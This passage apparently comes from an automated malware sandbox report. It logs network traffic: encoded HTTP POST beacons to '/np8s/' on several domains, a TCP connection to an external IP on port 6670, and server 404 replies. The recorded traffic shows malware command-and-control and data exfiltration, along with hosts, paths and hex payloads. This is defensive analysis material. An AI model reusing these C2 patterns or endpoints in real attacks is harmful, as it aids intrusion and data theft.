73 57 39 4e 4a 54 77 6f 48 78 72 61 4f 79 6c 38 49 72 35 70 45 7a 6c 71 45 76 79 45 43 4e 6c 4e 41 39 77 68 49 6f 54 48 44 7e 72 4e 34 37 4a 39 4d 36 5f 37 45 38 6c 42 4a 48 6e 35 31 49 4e 4f 41 6d 53 4d 48 31 30 31 35 58 4e 63 43 6e 30 38 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
zVB=BCkGHlEt(iAIsbyMCITLHu~O9kksE0VtOupkf0KSNVUNstDDWoDbHmNB~grUrhOJg6xqxCu8eBac8hToTeayT761DpxpDtOnqzTEoLdVhTr8pvEgPY~O9i8aj0h7(9mVUZZptGkIwEDZtE9IxBgA7_38lbMuAKgzgBLehUZNWWHoMQjmD_ZRrG5p(u~6JFCc2S9FdRJvv9b3rEiVNe(Ql8udA_mtr8rJ9cHLKJ8jx4USELpkXUb_sWr2nD89rGl0oMK3c8UduC6UEbtMFZTzw5iOuNMPvwFCFQzobNQNULO26UuQKi3GyuYlwvioba231sW9NJTwoHxraOyl8Ir5pEzlqEvyECNlNA9whIoTHD~rN47J9M6_7E8lBJHn51INOAmSMH1015XNcCn08g).
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.ratebill.comConnection: closeContent-Length: 36477Cache-Control: no-cacheOrigin: http://www.ratebill.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.ratebill.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 7a 56 42 3d 42 43 6b 47 48 6e 51 37 78 32 77 56 78 62 50 73 57 65 58 66 50 5f 75 4d 78 30 6f 6a 61 47 51 74 4b 61 74 61 41 68 32 6a 63 67 51 62 6f 64 65 54 53 75 58 54 48 6e 38 6c 77 7a 50 75 76 42 4b 4b 67 37 56 55 78 43 71 38 66 41 79 4d 38 47 66 4f 55 38 69 39 52 62 36 4a 45 70 77 76 56 63 53 4b 71 7a 57 52 6f 4c 45 4b 68 6a 48 38 6f 4e 38 67 4a 5a 7e 4a 69 53 38 44 67 30 52 6e 37 39 72 48 55 5a 42 68 74 43 6b 49 78 30 50 5a 33 6b 74 4a 6d 57 4d 44 6a 5f 32 58 7a 4c 4d 4e 4f 71 6c 41 67 42 48 77 68 52 35 4e 57 41 76 6f 44 67 44 6d 49 75 5a 53 7e 6d 35 73 73 2d 7e 6a 4e 46 50 45 32 53 52 5a 64 56 52 56 75 49 62 33 6c 55 69 59 63 5f 37 75 75 39 75 30 43 5f 53 61 72 39 58 6b 39 4e 71 59 4b 4c 35 47 6e 36 4d 70 59 2d 31 65 58 52 4c 42 76 32 71 5f 76 6a 38 71 72 47 6c 45 6f 4d 4b 5a 63 39 6b 64 75 44 79 55 46 49 46 4d 48 61 36 6c 76 5a 69 4c 71 4e 4d 72 7e 67 5a 75 46 51 71 6d 62 4d 39 49 55 37 69 32 37 45 53 51 65 33 72 48 77 75 59 6a 67 5f 69 67 66 61 32 34 31 73 57 4c 4e 49 53 74 76 30 31 72 49 76 79 6c 73 61 44 35 6c 55 7a 6c 6d 6b 76 77 4c 69 42 50 4e 41 31 38 68 49 5a 6d 48 77 53 72 49 36 44 4a 7a 4a 61 5f 34 30 38 6c 4f 70 48 35 32 30 52 42 47 77 75 5f 4c 6e 30 44 70 61 43 36 53 47 76 5f 67 75 48 56 41 34 78 5a 4d 6f 70 2d 31 65 47 35 79 72 55 52 33 54 56 69 4b 78 7e 4c 75 5f 35 4d 67 6d 58 36 43 58 69 31 38 4b 52 4e 73 48 6f 56 49 73 4b 46 4c 4a 68 42 68 73 31 4f 58 6f 7e 67 76 53 53 77 55 65 68 52 71 73 71 67 49 58 32 5a 4e 6b 77 6c 7a 69 43 6b 52 6c 49 77 39 61 45 43 55 61 7a 30 41 50 70 73 41 57 70 47 6d 55 64 39 74 53 44 33 54 6e 74 38 6a 
63 58 43 41 78 6e 48 47 63 4c 30 54 63 69 53 68 64 4d 6f 31 44 55 57 64 51 71 41 54 41 53 63 7e 74 7e 69 77 59 47 46 4a 76 32 79 68 41 6b 6e 41 76 58 5a 73 57 28 4b 53 71 57 4d 64 68 57 78 4f 59 6c 74 5a 30 55 41 71 48 45 6f 46 73 76 74 6c 6a 54 31 43 71 7a 2d 50 6b 53 4f 28 4c 47 74 65 34 41 6e 39 66 6d 4d 69 71 79 52 68 6c 6f 42 6e 36 56 74 76 6a 7e 47 7a 75 69 6e 78 54 58 78 61 4d 64 54 36 47 62 35 36 4b 63 57 49 49 62 74 28 37 5a 4f 79 71 71 68 57 67 5a 4c 6c 6b 75 77 44 32 66 78 70 37 31 51 68 61 74 41 6a 2d 4f 6c 4b 38 30 67 74 31 7e 54 77 70 42 61 47 69 61 53 50 74 36 41 63 41 35 32 36 2d 63 38 28 67 7a 43 41 76 6a 49 4c 69 78 51 61 33 43 6f 6a 6e 4b 64 5a 59 50 4d 46 45 6e 50 73 74 63 36 28 61 48 73 73 66 4b 68 45 30 53 79 59 4b 28 31 66 55 55 55 38 66 57 4c 6d 34 70 63 71 47 39 6f 36 5f 4a 39 75 2d 76 5a 45 6a 4e 33 37 61 4a 4a 69 75 46 74 38 5f 79 6d 73 6e 54 4b 78 67 66 2d 58 63 44 6d 56 39 4b 61 43 74 47 51 76 58 38 55 65 71 79 69 59 52 75 4a 4e 4f 32 43 4e 67 79 4e 6c 69 59 64 65 4c 79 4a 35 4e
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.topings33.comConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.topings33.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.topings33.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 7a 56 42 3d 78 33 62 6f 4f 32 30 54 63 6b 62 46 62 45 58 79 63 37 47 52 61 54 64 70 54 53 62 71 63 39 4c 5a 48 34 58 45 31 76 79 51 34 6a 76 47 62 61 4d 2d 38 79 31 62 64 76 59 67 48 50 49 74 35 69 6b 75 55 4e 54 53 31 5a 78 49 50 46 34 48 39 54 56 6b 69 36 6c 49 52 36 79 70 7e 4b 61 69 73 52 73 67 39 65 47 39 34 30 51 4b 7a 46 44 61 47 63 44 73 53 70 33 42 73 4d 39 36 77 37 33 5a 42 71 33 4a 79 38 72 71 32 46 79 30 4f 71 79 41 31 52 79 4d 39 57 35 77 73 55 28 56 44 52 4a 64 41 73 28 6d 62 64 69 63 28 64 70 53 35 56 47 42 63 39 41 2d 55 6f 6f 35 45 58 4f 57 68 33 70 59 63 71 67 70 72 6f 4f 38 38 2d 45 56 50 37 7a 4c 41 47 31 46 66 63 37 56 78 4a 63 50 75 35 38 63 72 49 77 77 46 68 77 39 55 6b 35 62 41 7a 76 4f 70 53 56 38 41 44 4f 5f 43 33 51 43 59 36 37 33 34 6b 70 54 57 73 56 2d 31 4a 66 34 4c 49 79 4f 7e 2d 61 77 65 6b 72 38 42 34 66 4d 44 74 71 6e 35 77 37 4a 76 4a 52 6b 62 78 71 75 6a 30 33 6c 61 56 36 6d 50 69 46 6d 6f 75 55 5f 66 6d 4e 51 43 73 34 4f 34 78 5a 4c 6d 6c 59 31 68 32 4d 59 6c 63 71 41 73 70 4c 76 76 7a 4d 38 31 51 34 46 64 35 43 4b 54 4a 75 38 50 38 54 74 32 78 4c 50 4a 47 42 58 4d 36 52 47 6c 68 6b 64 41 5a 59 39 28 68 68 36 47 55 32 59 35 68 37 30 69 39 71 6d 66 53 7e 68 6b 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
zVB=x3boO20TckbFbEXyc7GRaTdpTSbqc9LZH4XE1vyQ4jvGbaM-8y1bdvYgHPIt5ikuUNTS1ZxIPF4H9TVki6lIR6yp~KaisRsg9eG940QKzFDaGcDsSp3BsM96w73ZBq3Jy8rq2Fy0OqyA1RyM9W5wsU(VDRJdAs(mbdic(dpS5VGBc9A-Uoo5EXOWh3pYcqgproO88-EVP7zLAG1Ffc7VxJcPu58crIwwFhw9Uk5bAzvOpSV8ADO_C3QCY6734kpTWsV-1Jf4LIyO~-awekr8B4fMDtqn5w7JvJRkbxquj03laV6mPiFmouU_fmNQCs4O4xZLmlY1h2MYlcqAspLvvzM81Q4Fd5CKTJu8P8Tt2xLPJGBXM6RGlhkdAZY9(hh6GU2Y5h70i9qmfS~hkQ).
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.topings33.comConnection: closeContent-Length: 36477Cache-Control: no-cacheOrigin: http://www.topings33.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.topings33.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 7a 56 42 3d 78 33 62 6f 4f 79 31 49 59 58 66 6d 58 30 61 55 52 70 32 4e 43 7a 74 72 66 43 66 6c 5a 38 57 48 4e 70 6e 36 78 74 37 6d 37 6a 6e 6d 52 4b 51 66 33 54 68 44 64 76 6f 5a 63 74 39 71 75 79 67 74 55 4e 72 38 31 5a 6c 49 4f 47 49 58 36 30 5a 65 69 5a 4e 50 63 36 79 56 39 4b 61 42 36 53 70 41 39 66 58 53 34 30 59 61 30 31 76 61 45 2d 4c 73 55 6f 33 4b 7a 63 39 38 76 4c 48 64 46 71 7a 2d 79 38 79 70 32 41 53 30 4f 61 7e 41 30 78 43 54 37 56 52 7a 32 30 28 51 47 52 4a 45 4f 38 79 42 62 63 57 79 28 63 35 53 36 6d 79 42 64 73 67 2d 45 50 63 36 4c 33 4f 54 77 6e 70 76 50 36 6b 34 72 6f 53 67 38 5f 77 76 4d 4b 48 4c 43 32 31 2d 61 50 72 33 37 36 45 69 6f 36 68 38 72 49 39 65 45 77 73 6c 55 67 78 33 51 77 32 6d 33 41 4e 47 41 42 43 46 4f 33 51 47 51 61 36 31 34 6b 6f 6b 57 73 56 41 31 4e 62 34 4c 4c 69 4f 34 2d 4b 77 59 67 4c 5f 65 34 66 4a 48 74 71 6c 39 77 28 70 76 4a 59 35 62 78 47 41 6a 6e 7a 6c 63 41 6d 6d 49 45 5a 6c 39 75 55 31 4d 57 4e 49 50 4d 34 5f 34 78 5a 6c 6d 6b 5a 75 67 46 34 59 6b 4e 71 41 76 50 28 76 71 44 4d 38 37 77 34 48 53 5a 50 52 54 4a 6e 30 50 39 69 50 32 47 37 50 4a 58 68 58 4d 62 52 47 6d 52 6b 64 5a 4a 5a 2d 36 54 35 32 4e 6b 37 53 79 55 79 5a 36 2d 48 49 4c 54 66 32 33 76 42 59 44 69 4c 49 6f 47 77 48 45 77 39 59 4e 63 47 64 50 44 72 2d 70 6f 47 42 47 62 4b 58 6f 77 75 66 61 47 66 70 57 68 72 69 59 44 6f 64 4d 70 42 77 6a 57 79 6c 44 4a 72 4f 76 6f 71 4c 43 76 73 39 55 49 77 38 67 75 36 75 41 59 4b 64 55 59 41 48 53 51 62 4e 56 52 28 62 5a 30 39 50 4e 56 75 48 73 30 39 7a 44 38 57 63 44 7a 5a 52 72 4e 31 47 55 6d 47 4f 
4e 77 4d 69 54 6a 33 35 63 45 71 6f 67 4b 68 39 58 62 72 62 45 4f 6e 46 38 37 46 59 77 67 43 4d 37 69 62 5a 66 4b 48 44 4c 6f 73 7a 6b 57 69 44 43 62 33 66 42 4e 41 42 28 44 36 4a 69 37 6a 46 57 5f 44 61 71 2d 70 6d 54 68 61 31 66 66 62 32 44 51 32 38 71 44 39 6a 57 49 77 6e 7a 75 6e 49 70 7a 6c 58 38 48 71 67 63 77 39 52 4a 67 4b 6a 52 70 64 72 71 61 52 66 58 50 28 4b 64 64 5a 2d 52 4f 79 49 30 71 61 4b 70 49 65 6e 7e 2d 49 48 78 42 4f 5f 35 46 7e 48 41 6c 49 59 41 37 54 32 79 75 5a 76 35 71 63 71 6e 6c 33 76 5a 78 43 6e 72 33 33 67 4c 4a 61 46 43 52 48 4b 53 53 41 46 51 79 39 33 42 33 57 34 57 31 51 41 69 5a 70 56 34 56 54 62 79 55 33 73 73 64 6d 66 6f 58 55 48 77 76 33 56 35 41 65 76 59 4f 63 5f 4b 32 53 79 67 76 6d 77 50 48 4c 6a 56 62 50 55 42 55 67 49 67 36 30 74 34 59 77 68 56 6c 46 37 6b 47 30 33 74 34 46 43 78 43 38 43 47 6f 53 37 4d 70 79 46 4b 6d 39 4f 32 4c 36 51 46 58 52 4b 37 6d 4f 4f 34 47 76 34 68 45 74 76 67 5f 53 56 35 35 51 34 4c 72 32 63 73 36 35 70 7e 45 4d 51 44 4e 73 57 51 4e 32 4d 42
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.jlbwaterdamagerepairseattle.comConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.jlbwaterdamagerepairseattle.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.jlbwaterdamagerepairseattle.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 7a 56 42 3d 53 39 54 57 7a 6a 54 34 6d 34 78 55 56 49 6a 61 73 47 34 71 30 72 6c 77 6d 4a 77 72 34 4a 34 34 74 39 4d 76 34 4b 57 39 74 39 4e 74 79 31 52 38 31 78 74 34 39 46 58 46 37 45 76 32 70 58 42 30 28 41 74 37 69 4b 36 71 49 56 6d 76 39 73 4d 53 73 6e 41 6f 70 2d 56 39 53 42 76 38 56 6d 62 59 35 51 63 55 28 2d 69 69 4b 52 56 62 47 6c 51 6d 4e 68 38 31 4d 4d 43 69 4e 57 39 79 63 45 66 74 49 6e 7e 31 6a 7a 49 58 69 73 76 52 77 69 42 55 49 35 61 67 4c 73 65 51 42 38 72 6d 32 74 66 31 4e 69 62 63 33 2d 4a 73 33 76 37 70 36 4e 43 2d 4f 33 37 67 69 6f 54 58 5a 53 5a 55 7a 5a 35 4e 75 72 72 74 39 4e 31 73 6d 52 32 7a 49 38 44 31 4b 4d 46 31 6f 44 4b 4a 42 6f 54 76 7e 31 70 57 45 35 37 32 42 6e 58 79 67 69 79 73 53 50 4e 42 54 5f 6b 43 6d 51 55 37 54 7a 79 6d 69 47 4c 79 7a 36 76 2d 77 38 52 5f 69 64 4b 54 6f 4e 36 4d 6f 5f 45 32 33 4c 50 4e 31 62 47 73 58 4d 4e 6b 4f 50 67 57 32 69 6a 6c 70 51 77 2d 6e 50 39 51 36 48 68 72 63 50 77 6f 53 41 71 74 6f 37 62 64 44 71 56 50 35 74 30 49 6b 56 67 31 41 36 48 4d 73 7a 59 6d 55 38 4a 66 30 43 66 38 52 59 6e 76 64 62 6a 78 47 77 72 4b 41 6b 49 7a 6f 6b 41 6f 4c 6d 39 59 49 34 67 5f 4c 79 41 34 76 4f 55 52 39 4f 75 58 44 32 7a 79 53 51 78 4a 46 47 6d 48 73 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
zVB=S9TWzjT4m4xUVIjasG4q0rlwmJwr4J44t9Mv4KW9t9Nty1R81xt49FXF7Ev2pXB0(At7iK6qIVmv9sMSsnAop-V9SBv8VmbY5QcU(-iiKRVbGlQmNh81MMCiNW9ycEftIn~1jzIXisvRwiBUI5agLseQB8rm2tf1Nibc3-Js3v7p6NC-O37gioTXZSZUzZ5Nurrt9N1smR2zI8D1KMF1oDKJBoTv~1pWE572BnXygiysSPNBT_kCmQU7TzymiGLyz6v-w8R_idKToN6Mo_E23LPN1bGsXMNkOPgW2ijlpQw-nP9Q6HhrcPwoSAqto7bdDqVP5t0IkVg1A6HMszYmU8Jf0Cf8RYnvdbjxGwrKAkIzokAoLm9YI4g_LyA4vOUR9OuXD2zySQxJFGmHsg).
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.jlbwaterdamagerepairseattle.comConnection: closeContent-Length: 36477Cache-Control: no-cacheOrigin: http://www.jlbwaterdamagerepairseattle.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.jlbwaterdamagerepairseattle.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 7a 56 42 3d 53 39 54 57 7a 69 75 7a 6f 6f 73 43 62 34 28 35 71 78 6f 2d 67 72 31 49 6c 35 30 30 32 6f 55 6a 37 66 6b 64 32 76 72 50 75 38 6b 77 6a 57 30 65 6a 44 64 67 39 46 48 67 33 57 62 36 34 6e 46 31 28 41 45 71 69 4b 32 71 4a 57 58 6b 7e 4e 63 30 74 46 59 70 72 65 56 46 54 42 75 34 52 6e 47 49 35 54 77 71 28 39 43 79 4b 43 52 62 46 44 63 6d 63 53 6b 45 50 73 43 6b 46 32 74 75 42 30 54 4b 49 6a 62 6f 6a 32 6f 58 69 63 6a 52 28 6a 78 56 41 65 4f 6e 66 73 66 61 58 73 72 37 73 64 6a 4c 4e 6b 48 45 33 5f 31 73 77 64 66 70 36 5a 79 2d 49 41 75 32 70 34 54 65 64 53 5a 54 6c 70 38 54 75 76 4c 70 39 4d 78 38 68 6a 71 7a 4c 73 44 6f 41 37 34 56 35 67 54 4c 53 6f 6e 49 7e 31 74 37 46 74 36 6c 42 6d 4b 68 32 6e 32 35 57 74 56 34 54 39 6f 6b 6b 77 55 6e 63 54 79 39 69 47 4c 43 7a 36 75 64 77 38 4e 5f 69 63 53 54 6e 39 4b 4d 35 74 64 67 31 37 50 55 28 37 47 79 54 4d 77 5f 4f 50 35 39 32 67 58 50 70 41 4d 2d 31 71 68 51 79 44 42 6f 4a 50 78 74 54 41 72 77 31 72 62 6b 44 71 55 69 35 76 64 4e 6b 43 6f 31 41 72 48 4d 76 52 41 6d 54 63 4a 66 78 43 66 69 66 34 71 6b 64 62 37 74 47 77 62 61 41 53 45 7a 6f 31 67 6f 4c 43 70 59 4c 49 67 5f 53 69 42 7a 76 63 39 65 36 39 32 63 4a 56 69 4b 4e 52 70 62 47 31 6a 34 34 46 49 51 28 68 62 42 59 33 70 57 39 42 6b 72 7e 65 78 36 52 4a 69 6f 7a 4e 79 57 36 30 66 67 54 38 41 52 61 72 76 36 76 4b 57 79 67 42 49 31 47 73 34 65 77 45 55 68 4a 52 7a 62 46 49 57 31 64 56 6a 2d 63 6f 64 4a 55 31 6c 42 65 79 70 4e 51 55 39 36 4d 4d 36 33 71 37 6c 4c 73 4c 7e 44 5a 4b 50 30 55 42 
44 30 49 61 33 34 79 78 7a 4f 33 75 34 76 54 57 39 52 39 4f 6b 64 33 71 47 66 58 55 74 39 37 2d 53 30 51 57 58 52 38 50 48 6a 45 6b 4c 69 59 62 4d 4b 56 35 69 6c 61 4b 63 56 48 58 49 56 58 58 79 33 53 69 72 33 63 73 57 4c 69 70 70 4e 6e 42 64 69 38 6d 43 31 75 6e 43 49 53 70 54 6c 4f 6e 63 48 48 72 6c 4e 46 63 4c 68 47 51 4b 58 43 67 4f 71 47 63 30 55 4f 72 6d 63 49 65 34 74 56 6e 52 6d 76 59 54 30 66 47 6c 61 77 53 4b 4a 36 67 54 66 34 59 50 48 72 38 7a 71 7a 36 48 44 61 47 41 50 49 65 49 32 68 39 48 4d 44 62 4a 36 4a 31 41 6c 54 32 72 58 57 4f 56 49 72 41 4d 4d 66 48 7e 6d 69 6f 53 6a 36 69 44 4a 51 50 50 36 74 47 79 36 47 58 67 51 7e 2d 57 42 48 45 72 65 30 6b 75 32 4b 6e 4d 44 31 51 47 63 55 69 54 65 78 75 28 49 6a 64 65 56 56 6a 69 58 5a 6c 41 57 61 47 53 42 79 69 4b 4e 6b 33 55 68 72 41 35 73 55 73 7a 66 74 77 47 37 4c 6a 71 41 37 6f 62 4a 6c 44 79 66 46 6d 47 55 4a 75 34 4d 41 33 56 30 39 78 6f 58 6a 6d 33 49 74 47 77 52 59 6a 6f 5a 53 39 34 70 70 46 6d 4a 50 67 7a 61 36 36 59 6e 39 4c 63 70 73 52 64
Source: global traffic TCP traffic: 192.168.2.5:49736 -> 91.193.75.133:6670
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 May 2022 16:42:49 GMTServer: nginx/1.19.10Content-Type: text/htmlContent-Length: 583Last-Modified: Tue, 15 Mar 2022 21:44:23 GMTAccept-Ranges: bytesVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 30 64 65 67 29 3b 20 7d 20 31 30 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 33 36 30 64 65 67 29 3b 20 7d 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 5f 73 6b 7a 5f 70 69 64 20 3d 20 22 39 50 4f 42 45 58 38 30 57 22 3b 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 63 64 6e 2e 6a 73 69 6e 69 74 2e 64 69 72 65 63 74 66 77 64 2e 63 6f 6d 2f 73 6b 2d 6a 73 70 61 72 6b 5f 69 6e 69 74 2e 70 68 70 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 6f 61 64 65 72 22 20 69 64 3d 22 73 6b 2d 6c 6f 61 64 65 72 22 3e 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 
6d 6c 3e 0a Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin { 0% { transform: rotate(0deg); } 100% { transform: rotate(360deg); } } </style> <script language="Javascript">var _skz_pid = "9POBEX80W";</script> <script language="Javascript" src="http://cdn.jsinit.directfwd.com/sk-jspark_init.php"></script></head><body><div class="loader" id="sk-loader"></div></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 May 2022 16:43:00 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 279Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 74 6f 70 69 6e 67 73 33 33 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.topings33.com Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecontent-type: text/htmlcontent-length: 252content-encoding: gzipvary: Accept-Encoding,User-Agent,User-Agentdate: Fri, 27 May 2022 16:43:24 GMTserver: LiteSpeedData Raw: 1f 8b 08 00 00 00 00 00 00 03 4c 8b b1 0e 82 40 10 05 fb fb 8a 95 5e 17 0c e5 66 13 61 97 dc 25 27 10 b3 14 f4 5c 42 25 51 e1 ff 0d d2 58 be 99 79 74 92 ae b6 b1 57 f0 76 8f d0 0f 55 0c 35 64 67 c4 a0 d6 20 8a c9 61 ae 97 1c 51 db 8c 1d ed 9b c9 eb 4d d8 91 05 8b ca 65 5e 42 bb ac d0 2c db 73 22 3c a0 23 fc 45 54 75 32 ee bf 82 ff 1a 5f b0 b3 39 c1 3b bd b6 f4 59 d3 04 c3 23 c2 17 00 00 ff ff 04 c1 bb 11 80 20 0c 00 d0 de 29 32 01 b4 16 1c b5 b6 6e 10 25 2a 1e bf 4b a2 59 df f7 7c 1b b3 78 30 14 68 5d e1 ec 6f 4b d0 1b e8 9d 05 84 f8 23 76 53 58 b6 38 85 35 9a 99 7b ca 6e a8 c4 09 2b 5e c4 34 30 b3 10 aa 16 72 47 af 3f 00 00 00 ff ff b2 d1 f7 b4 e3 b2 d1 77 f2 77 89 b4 b3 d1 f7 08 f1 f5 b1 e3 1a c9 00 00 00 00 ff ff 03 00 1f 08 e8 aa f0 01 00 00 Data Ascii: L@^fa%'\B%QXytWvU5dg aQMe^B,s"<#ETu2_9;Y# )2n%*KY|x0h]oK#vSX85{n+^40rG?ww
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecontent-type: text/htmlcontent-length: 252content-encoding: gzipvary: Accept-Encoding,User-Agent,User-Agentdate: Fri, 27 May 2022 16:43:24 GMTserver: LiteSpeedData Raw: 1f 8b 08 00 00 00 00 00 00 03 4c 8b b1 0e 82 40 10 05 fb fb 8a 95 5e 17 0c e5 66 13 61 97 dc 25 27 10 b3 14 f4 5c 42 25 51 e1 ff 0d d2 58 be 99 79 74 92 ae b6 b1 57 f0 76 8f d0 0f 55 0c 35 64 67 c4 a0 d6 20 8a c9 61 ae 97 1c 51 db 8c 1d ed 9b c9 eb 4d d8 91 05 8b ca 65 5e 42 bb ac d0 2c db 73 22 3c a0 23 fc 45 54 75 32 ee bf 82 ff 1a 5f b0 b3 39 c1 3b bd b6 f4 59 d3 04 c3 23 c2 17 00 00 ff ff 04 c1 bb 11 80 20 0c 00 d0 de 29 32 01 b4 16 1c b5 b6 6e 10 25 2a 1e bf 4b a2 59 df f7 7c 1b b3 78 30 14 68 5d e1 ec 6f 4b d0 1b e8 9d 05 84 f8 23 76 53 58 b6 38 85 35 9a 99 7b ca 6e a8 c4 09 2b 5e c4 34 30 b3 10 aa 16 72 47 af 3f 00 00 00 ff ff b2 d1 f7 b4 e3 b2 d1 77 f2 77 89 b4 b3 d1 f7 08 f1 f5 b1 e3 1a c9 00 00 00 00 ff ff 03 00 1f 08 e8 aa f0 01 00 00 Data Ascii: L@^fa%'\B%QXytWvU5dg aQMe^B,s"<#ETu2_9;Y# )2n%*KY|x0h]oK#vSX85{n+^40rG?ww
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecontent-type: text/htmlcontent-length: 584date: Fri, 27 May 2022 16:43:24 GMTserver: LiteSpeedvary: User-Agent,User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6e 70 38 73 2f 3f 34 68 4d 34 3d 6f 34 42 30 66 26 61 6d 70 3b 7a 